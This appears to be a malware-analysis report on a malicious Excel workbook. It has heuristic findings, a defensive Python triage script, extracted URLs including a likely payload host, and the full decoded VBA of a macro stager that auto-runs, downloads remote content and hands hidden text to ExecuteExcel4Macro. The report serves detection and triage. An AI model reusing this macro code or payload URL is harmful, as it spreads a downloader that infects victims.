Verdict: MALICIOUS
Risk Score: 210
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution
This Excel file carries VBA macros that act as a stager for an Excel 4.0 (XLM) macro. Workbook_Open shows the UserForm Class5 through CallByName; the form's UserForm_Initialize handler runs ClaModu.PublicSub, which creates two COM objects from ProgIDs stored in UserForm control properties (Class7.TextBox1.Caption and Class7.Label2.Tag), issues a request with Rocky1.Open Me.Label3.Caption, Me.T10_Text.Tag, False followed by Rocky1.Send, writes Rocky1.responseBody into Valaar1 (Type = 1, binary), and finally hands Class7.T10_Text.Text to ExecuteExcel4Macro. The method names used (.Open/.Send/.responseBody on one object, .Type/.Open/.write/savetofile on the other) are those of an XMLHTTP request object and a binary ADODB.Stream; if that is what the ProgIDs resolve to, Label3.Caption holds the HTTP verb and T10_Text.Tag the download URL. The ProgIDs, the URL and the XLM formula therefore live in form-control properties rather than in the macro text, which is why neither the URL nor the cmd.exe string behind SC_STR_CMD appears in the decoded VBA source. Two caveats for anyone re-triaging the sample: the savetofile call that would write the response to wrnglr.exe sits under #If FR_0 Then, so it only compiles if FR_0 is defined as non-zero in the project's conditional compilation arguments (an undefined constant evaluates to False), otherwise the hand-off to the second stage is the ExecuteExcel4Macro call alone; and the decoded source does itself contain three ExecuteExcel4Macro calls, so the p-code/source mismatch reported by the ActiveX XLM stager heuristic should be confirmed against a p-code disassembly (for example with pcodedmp) rather than taken from the rule alone. Of the extracted URLs, only http://27.102.70.196/k2 is a plausible payload location; the symcb.com, symcd.com and thawte.com entries are the CRL, OCSP and certificate-policy endpoints of a Thawte/Symantec certificate chain embedded in the file, and their trailing characters (0, 0&, 0W) are DER length bytes picked up by string extraction.
Heuristics (7)
- VBA macros detected [OLE_VBA_MACROS] (medium, 4 related findings): Document contains VBA macro code.
- VBA ActiveX event launches decoded Excel4 macro [OLE_VBA_ACTIVEX_XLM_STAGER] (critical): The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not: the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 APIs or drop payloads, hidden from source-level scanners.
- CreateObject call [OLE_VBA_CREATEOBJ] (high). Matched line in script:
    Set Class7.Rocky1 = CreateObject(Class7.TextBox1.Caption)
    time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")
- CallByName call [OLE_VBA_CALLBYNAME] (high). Matched line in script:
    On Error Resume Next
    CallByName Class5, "Show", VbMethod
- Workbook_Open macro [OLE_VBA_WBOPEN] (low). Matched line in script:
    Attribute VB_Customizable = True
    Sub WorkBook_open()
    On Error Resume Next
- Suspicious cmd.exe invocation with execution flag [SC_STR_CMD] (high). No matched line in the decoded VBA source.
- Embedded URL [EMBEDDED_URL] (info): One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label names the channel (macro, JS, link annotation, document body, ...) that reached each URL. All of the URLs below were found in document text (OLE body), none in the macro code. The seven symcb.com, symcd.com and thawte.com entries are CRL, OCSP and policy (CPS/repository) endpoints from a Thawte/Symantec certificate chain, and the trailing 0, 0& and 0W are DER length bytes that string extraction dragged along; only the first entry is a candidate payload host.
  - http://27.102.70.196/k2
  - http://t2.symcb.com0
  - http://tl.symcd.com0&
  - http://t1.symcb.com/ThawtePCA.crl0
  - http://tl.symcb.com/tl.crl0
  - https://www.thawte.com/cps0/
  - https://www.thawte.com/repository0W
  - http://tl.symcb.com/tl.crt0
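The summary and the heuristics above describe two review steps that are easy to re-run by hand on the decoded macro text: find the auto-firing entry points and the CreateObject/CallByName/ExecuteExcel4Macro calls whose arguments are hidden behind form-control properties or string concatenation (with a note on code gated by #If constants), and separate certificate-chain URLs from payload candidates. The script below is an added example written for this page; it is not the analyzer's own code and not part of the sample. The rule names echo the report's labels, but the auto-event list, the certificate-URL keyword list, the DER-residue trimming and the abridged sample inputs are this example's own assumptions.

```python
"""Static triage of decoded VBA source and of URL strings pulled from an OLE file.

Added example (not the analyzer's code, not part of the sample). Rule names echo
the report's labels; the keyword lists, residue trimming and sample inputs are
assumptions made for this example.
"""
import re

# Constructed input: an abridged copy of the decoded VBA shown on this page.
SAMPLE_VBA = '''Sub WorkBook_open()
On Error Resume Next
CallByName Class5, "Show", VbMethod
End Sub
Public Sub MethodENG()
Set Class7.Rocky1 = CreateObject(Class7.TextBox1.Caption)
ExecuteExcel4Macro "MESSAGE(False, ""Release"")"
Set Class7.Valaar1 = CreateObject(Class7.Label2.Tag)
End Sub
Public Sub PublicSub()
Rocky1.Open Me.Label3.Caption, Me.T10_Text.Tag, False
#If FR_0 Then
CallByName Class7.Valaar1, "savet" & "ofile", VbMethod, "wrnglr.e" & "" + "xe", 2
#End If
ExecuteExcel4Macro Class7.T10_Text.Text
End Sub
Private Sub UserForm_Initialize()
FUnt
End Sub
'''

# Constructed input: the URL strings listed in this report.
SAMPLE_URLS = [
    "http://27.102.70.196/k2",
    "http://t2.symcb.com0",
    "http://tl.symcd.com0&",
    "http://t1.symcb.com/ThawtePCA.crl0",
    "http://tl.symcb.com/tl.crl0",
    "https://www.thawte.com/cps0/",
    "https://www.thawte.com/repository0W",
    "http://tl.symcb.com/tl.crt0",
]

# Entry points Office fires without a click (assumed list; extend as needed).
AUTO_EVENT = re.compile(
    r"^(?:Private\s+|Public\s+)?Sub\s+"
    r"(Workbook_Open|Auto_Open|Document_Open|UserForm_Initialize|UserForm_Activate)\b",
    re.I)
# Calls whose argument decides what actually runs; group 1 captures that argument.
CALLS = {
    "OLE_VBA_CREATEOBJ": re.compile(r"\bCreateObject\s*\((.*)\)", re.I),
    "OLE_VBA_CALLBYNAME": re.compile(r"\bCallByName\b(.*)", re.I),
    "OLE_VBA_XLM": re.compile(r"\bExecuteExcel4Macro\b(.*)", re.I),
}
# One VBA string literal ("" is an escaped quote). Anything else, such as
# Class7.TextBox1.Caption or "savet" & "ofile", keeps the value out of the source.
LITERAL = re.compile(r'^"(?:[^"]|"")*"$')
CC_IF = re.compile(r"^#If\s+(\w+)\s+Then", re.I)
CC_END = re.compile(r"^#End\s+If", re.I)


def analyze_vba(src, defined_consts=()):
    """Return one finding per hit: rule, line, text, indirect, gated."""
    findings = []
    active = [True]  # truth value of each enclosing #If; an undefined constant is False
    for lineno, raw in enumerate(src.splitlines(), 1):
        line = raw.strip()
        if m := CC_IF.match(line):
            active.append(m.group(1) in defined_consts)
            continue
        if CC_END.match(line):
            active.pop()
            continue
        gated = not all(active)  # gated code never compiles unless the constant is set
        if m := AUTO_EVENT.match(line):
            findings.append({"rule": "AUTO_EVENT", "line": lineno, "text": m.group(1),
                             "indirect": False, "gated": gated})
        for rule, rx in CALLS.items():
            if m := rx.search(line):
                arg = m.group(1).strip()
                findings.append({"rule": rule, "line": lineno, "text": line,
                                 "indirect": not LITERAL.match(arg), "gated": gated})
    return findings


def summarize(findings):
    """Condense findings into the facts a verdict rests on."""
    return {
        "auto_events": sorted(f["text"] for f in findings if f["rule"] == "AUTO_EVENT"),
        "indirect_createobject": sum(f["indirect"] for f in findings
                                     if f["rule"] == "OLE_VBA_CREATEOBJ"),
        "indirect_xlm": sum(f["indirect"] for f in findings if f["rule"] == "OLE_VBA_XLM"),
        "gated_lines": sorted({f["line"] for f in findings if f["gated"]}),
    }


# Host/path fragments typical of certificate-chain plumbing (assumed list).
CERT_INFRA = re.compile(r"\.crl|\.crt|/cps|/repository|symcb\.com|symcd\.com", re.I)
# Strings lifted from DER-encoded certificates carry the next length byte and up
# to two bytes of the following field ("...crl0", "...com0&", "...cps0/").
DER_RESIDUE = re.compile(r"0.{0,2}$")


def classify_urls(urls):
    """Map each URL to (cleaned_url, label); payload candidates are left untouched."""
    result = []
    for url in urls:
        if CERT_INFRA.search(url):
            result.append((DER_RESIDUE.sub("", url), "certificate-chain"))
        else:
            result.append((url, "candidate-payload"))
    return result


if __name__ == "__main__":
    for f in analyze_vba(SAMPLE_VBA):
        print(f"{f['rule']:20} L{f['line']:<3} indirect={f['indirect']!s:5} "
              f"gated={f['gated']!s:5} {f['text']}")
    print(summarize(analyze_vba(SAMPLE_VBA)))
    for url, label in classify_urls(SAMPLE_URLS):
        print(f"{label:18} {url}")
```

Run on the excerpt, the summary reports two auto-firing entry points, both CreateObject calls and one of the ExecuteExcel4Macro calls taking an indirect argument, and the savetofile line as gated; passing defined_consts=("FR_0",) clears the gated list, which is the check to make once the project's conditional compilation arguments are known. The URL classifier keeps http://27.102.70.196/k2 as the only payload candidate and trims the DER residue only from URLs it has already tagged as certificate infrastructure, so a real URL ending in a digit is never mangled.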
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3342 bytes | 0f8d5393f732295ecb858d596155660fa6602c129079ec7d970b367fb929c19b |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_open()
On Error Resume Next
CallByName Class5, "Show", VbMethod
End Sub
Attribute VB_Name = "CodeBlock"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub MethodENG()
Dim time
Set Class7.Rocky1 = CreateObject(Class7.TextBox1.Caption)
time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")
ExecuteExcel4Macro "MESSAGE(False, ""Release"")"
Set Class7.Valaar1 = CreateObject(Class7.Label2.Tag)
Dim fUP: fUP = 0
#If FR_9 Then
Dim DirectionComponent_5
Dim DirectionComponent_6
Dim DirectionComponent_7
Dim DirectionComponent_9
Dim DirectionComponent_8: DirectionComponent_8 = 8
#End If
Dim DirectionComponent_12
Dim DirectionComponent_11: DirectionComponent_11 = ""
Dim fDOWN: fDOWN = 0
fDOWN = 1
fDOWN = 2
fDOWN = 3
fDOWN = 4
End Sub
Attribute VB_Name = "ClaModu"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub PublicSub()
CodeBlock.MethodENG
Dim DirectionComponent_4
Dim DirectionComponent_3
Class7.Label5_Click
Class7.Rocky1.Send
With Class7.Valaar1
.Type = 1
End With
Class7.Valaar1.Open
With Class7.Valaar1
.write Class7.Rocky1.responseBody
End With
#If FR_0 Then
CallByName Class7.Valaar1, "savet" & "ofile", VbMethod, "wrnglr.e" & "" + "xe", 2
#End If
ExecuteExcel4Macro Class7.T10_Text.Text
ExecuteExcel4Macro "MESSAGE(False, ""Fix Marv"")"
End Sub
Attribute VB_Name = "Class7"
Attribute VB_Base = "0{BCDF87D8-10FE-4A45-9037-E1DA98118387}{A67BF4E4-00B4-417B-8495-74F7DD38C327}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Rocky2 As Object
Public Valaar3 As Object
Public Rocky1 As Object
Public Valaar2 As Object
Public Rocky3 As Object
Public Valaar1 As Object
Public Sub Label5_Click()
Dim DirectionComponent_5
Rocky1.Open Me.Label3.Caption, Me.T10_Text.Tag, False
Dim DirectionComponent_6
End Sub
Public Sub S1000()
End Sub
Public Sub frfr4()
End Sub
Attribute VB_Name = "Class5"
Attribute VB_Base = "0{91950FA9-49B3-4930-930C-C2569C5DA979}{FF977004-D6B6-4519-B08E-2136C0F2ABC7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub FUnt()
Dim rd1 As New ClaModu
rd1.PublicSub
End Sub
Private Sub UserForm_Initialize()
FUnt
Unload Me
End Sub
```